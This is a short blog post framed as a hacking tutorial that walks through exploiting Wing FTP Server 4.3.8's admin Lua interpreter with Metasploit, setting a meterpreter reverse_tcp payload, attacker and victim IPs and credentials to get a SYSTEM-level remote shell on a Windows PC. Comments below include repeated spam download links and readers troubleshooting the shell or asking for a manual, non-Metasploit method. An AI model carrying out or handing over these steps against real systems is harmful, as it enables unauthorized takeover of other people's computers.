Sunday, 14 September 2014

How to Hack Remote Windows PC using Wing FTP Server Authenticated Command Execution ??

This module exploits the embedded Lua interpreter in the admin web interface for versions 4.3.8 and below. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.

Exploit Targets:-
Wing FTP 4.3.8

Requirements :-
Attacker: kali Linux,backtrack linux

Victim PC: Windows 7

*steps:-*


1.Open Kali terminal type
        msfconsole

2.Now type

 use exploit/windows/ftp/wing_ftp_admin_exec

3.msf exploit (wing_ftp_admin_exec)>set payload windows/meterpreter/reverse_tcp

4.msf exploit (wing_ftp_admin_exec)>set lhost 192.168.0.10 (IP of Local Host)

5.msf exploit (wing_ftp_admin_exec)>set rhost 192.168.0.5 (IP of Remote Host)

6.msf exploit (wing_ftp_admin_exec)>set username rajchandel

7.msf exploit (wing_ftp_admin_exec)>set password ——–

8.msf exploit (wing_ftp_admin_exec)>exploit


That's it

8 comments:

  1. Replies
    1. // Kali Linux Tutorials: How To Hack Remote Windows Pc Using Wing Ftp Server Authenticated Command Execution ?? >>>>> Download Now

      >>>>> Download Full

      // Kali Linux Tutorials: How To Hack Remote Windows Pc Using Wing Ftp Server Authenticated Command Execution ?? >>>>> Download LINK

      >>>>> Download Now

      // Kali Linux Tutorials: How To Hack Remote Windows Pc Using Wing Ftp Server Authenticated Command Execution ?? >>>>> Download Full

      >>>>> Download LINK 4f

      Delete
  2. Hi,

    I get a command stager progress go's to 100% then what? Should I have got an open shell or do I need to open it myself from meterpreter?

    Thanks

    ReplyDelete
    Replies
    1. I worked it out..., thanks anyway

      Delete
    2. what did you do to work it out? Mine hangs at 100%, too.

      Delete
  3. can you show the manual way of doing this, with out metasploit?

    ReplyDelete
  4. // Kali Linux Tutorials: How To Hack Remote Windows Pc Using Wing Ftp Server Authenticated Command Execution ?? >>>>> Download Now

    >>>>> Download Full

    // Kali Linux Tutorials: How To Hack Remote Windows Pc Using Wing Ftp Server Authenticated Command Execution ?? >>>>> Download LINK

    >>>>> Download Now

    // Kali Linux Tutorials: How To Hack Remote Windows Pc Using Wing Ftp Server Authenticated Command Execution ?? >>>>> Download Full

    >>>>> Download LINK NG

    ReplyDelete